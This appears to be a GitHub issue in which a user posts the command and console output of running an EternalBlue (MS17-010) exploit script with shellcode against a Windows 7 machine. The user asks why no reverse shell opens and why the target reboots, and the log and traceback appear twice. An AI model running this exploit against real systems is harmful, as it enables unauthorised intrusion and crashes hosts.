You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
shellcode size: 962
numGroomConn: 3
Target OS: Windows 7 Professional N 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/root/Eternal-Blue-master/eternalblue_exploit7.py", line 563, in
exploit(TARGET, sc, numGroomConn)
File "/root/Eternal-Blue-master/eternalblue_exploit7.py", line 545, in exploit
conn.logoff()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3757, in logoff
self.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 920, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer
The text was updated successfully, but these errors were encountered:
I was wondering if you had come across this before, I can;t get a reverse shell and it reboots the Windows 7 PC, any help would be much appreciated:
python /root/Eternal-Blue-master/eternalblue_exploit7.py 10.11.9.129 /root/Eternal-Blue-master/bin/sc_x86.bin 3
shellcode size: 962
numGroomConn: 3
Target OS: Windows 7 Professional N 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/root/Eternal-Blue-master/eternalblue_exploit7.py", line 563, in
exploit(TARGET, sc, numGroomConn)
File "/root/Eternal-Blue-master/eternalblue_exploit7.py", line 545, in exploit
conn.logoff()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3757, in logoff
self.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 920, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer
The text was updated successfully, but these errors were encountered: